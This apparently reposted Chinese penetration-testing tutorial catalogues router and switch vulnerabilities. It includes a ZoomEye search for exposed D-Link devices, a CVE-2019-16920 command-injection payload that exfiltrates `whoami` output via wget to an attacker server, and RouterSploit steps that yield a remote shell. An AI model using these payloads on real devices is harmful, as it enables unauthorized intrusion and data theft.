【内网渗透】网络设备漏洞

admin 2023年5月29日00:24:55评论47 views字数 2599阅读8分39秒阅读模式

简介:提到网络设备大家应该都不陌生,不论是小型局域网,还是公司办公网等,只要是涉及网络的都会有网络设备的存在。网络设备包括中继器、网桥、路由器、网关、防火墙、交换机等设备,在内网攻击中,我们不仅要对操作系统、数据库等进行攻击,还要对网络设备进行漏洞攻击,在这一节主要介绍路由器、交换机和安全设备的一些常见漏洞,让大家能够掌握更多的内网攻击的攻击面。

1、路由器漏洞

说明:随着信息时代的到来,路由器是内部网络中必不可少的设备。如果路由器存在漏洞,这将大大影响整个网络系统的安全性,同时也对用户的隐私造成极大威胁。

路由器基本都是基于Linux系统的,架构以MIPS和ARM为主,大部分含有Telnet服务,也会有很多基础命令以Busybox的方式实现,如cat、chmod、date、echo、ifconfig、ls、kill等,当然为了方便用户管理调试,现在越来越多的网络设备还会有Web配置界面。

1.路由器常见漏洞

路由器常见的漏洞有很多,下面列举一些在内网攻击中使用的漏洞,通常为命令执行漏洞、拒绝服务漏洞、未授权访问漏洞和自带后门漏洞这四种类型。

1)命令执行漏洞

TP-Link SR20本地网络远程代码执行漏洞、Dir-890l命令执行漏洞、腾达AC15远程代码执行漏洞(CVE-2018-5767)、D-Link DIR-859远程代码执行漏洞(CVE-2019-17621)。

2)拒绝服务漏洞

TP-Link WR886N V7 Inetd Task Dos、Cisco-ASA-拒绝服务漏洞(CVE-2018-0296)。

3)未授权访问漏洞

腾达某型号路由器后台登录认证、电信光猫HG2821T-U未授权导致信息泄露、D-Link多型号路由器存在任意文件下载漏洞、某些型号的Comba和D-Link路由器存在管理员密码泄露漏洞等。

4)自带后门漏洞

思科路由器SYNful Knock后门程序、Belkin SURF路由器后门、Tenda路由器后门等。

路由器漏洞危害:

当然路由器除了可能存在直接影响安全的漏洞外,还可能存在弱口令的问题,如Web管理后台弱口令、23端口弱口令等。攻克路由器后可以做DNS劫持、蠕虫病毒、ARP欺骗、网络拓扑、流量转发、放置后门等操作。

2.路由器典型漏洞演示

现在介绍一下路由器漏洞CVE-2019-16920。2019年9月,Fortinet FortiGuard实验室发现并报告了D-Link产品中存在一个非认证的命令注入漏洞:CVE-2019-16920,该漏洞可造成远程代码执行。受影响的产品有DIR-655、DIR-866L、DIR-652、DHP-1565、DIR-855L、DAP-1533、DIR-862L、DIR-615、DIR-835、DIR-825等。

通过zoomeye搜索引擎查找网上暴露的存在漏洞设备:

DIR-825 +port:"8080"

【内网渗透】网络设备漏洞

该漏洞源于一个失败的身份认证检查,当要进入管理页面时,需要执行登录操作:

【内网渗透】网络设备漏洞

【内网渗透】网络设备漏洞

洞产生的原因是参数“ping_ipaddr”执行命令注入,虽然响应是跳转到登录页面,但操作“ping_test”仍然执行。

先在外网服务器开启端口监听,用于接收目标的回显信息:

nc -lvvp 9980

【内网渗透】网络设备漏洞

修改请求包,将请求内容改为以下payload执行查看当前用户命令:

html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://服务器ip:9980/?$(whoami)&=

【内网渗透】网络设备漏洞

发送请求包后外网攻击机收到命令执行回显:

【内网渗透】网络设备漏洞

当然这个漏洞不只这一种利用方式,还可以让攻击者检索管理员密码,或将自己的后门安装到服务器上等。

【内网渗透】网络设备漏洞

3. 路由器渗透工具RouterSploit

工具在kali系统安装:

apt-get install python3-pip

git clone https://www.github.com/threat9/routersploit

cd routersploit

python3 -m pip install -r requirements.txt

python3 rsf.py

【内网渗透】网络设备漏洞

搭建流量隧道进入目标内网后使用RouterSploit工具对目标内网路由器进行漏洞扫描:

proxychains python3 rsf.py

//使用自动扫描模块

use scanners/autopwn

【内网渗透】网络设备漏洞

对192.168.0.100这个网络设备进行自动扫描:

set target 192.168.0.100

run

【内网渗透】网络设备漏洞

扫描出这个设备存在漏洞并推荐使用的漏洞利用模块,但不一定准确也可以自己查找漏洞利用模块:

【内网渗透】网络设备漏洞

自己选择使用漏洞利用模块并配置攻击目标:

use exploits/routers/netgear/multi_rce

set target 192.168.0.100

【内网渗透】网络设备漏洞

执行 run 命令,攻击成功后返回一个交互式shell界面可以执行命令:

【内网渗透】网络设备漏洞

2、交换机漏洞

说明:交换机在企业网中占有重要的地位,通常是整个网络的核心所在,这一地位使它成为黑客入侵和病毒肆虐的重点对象。常用的交换机品牌有华为交换机、H3C交换机、思科交换机、TP-LINK交换机、锐捷交换机、D-Link交换机、NETGEAR交换机、中兴交换机等,下面例举一些交换机漏洞。

(1)命令执行漏洞

Cisco Smart Install远程命令执行漏洞(CVE-2018-0171)、HP 2910al-48G任意命令执行漏洞、信锐WAC命令执行漏洞。

(2)未授权漏洞

Cisco CatOS密码提示未授权远程命令执行漏洞、Cisco Small Business 220 Series Smart Plus Switches未授权访问漏洞。

(3)拒绝服务漏洞

MOXA EDS-405A工业交换机拒绝服务漏洞、H3C S5120V2-SI系列交换机拒绝服务漏洞、H3C S5000PV3-EI系列以太网交换机拒绝服务漏洞。

(4)其他类型漏洞

Huawei OceanStor SNS3096信息泄露漏洞、H3C ACG1000-M交换机存在弱口令漏洞。

交换机漏洞危害:

黑客攻破交换机后,可以进行的攻击有VLAN跳跃攻击、生成树攻击、MAC表洪水攻击、ARP攻击、VTP攻击、挂马、端口镜像、流量污染等。



原文始发于微信公众号(ZackSecurity):【内网渗透】网络设备漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月29日00:24:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网渗透】网络设备漏洞http://cn-sec.com/archives/1768635.html

发表评论

匿名网友 填写信息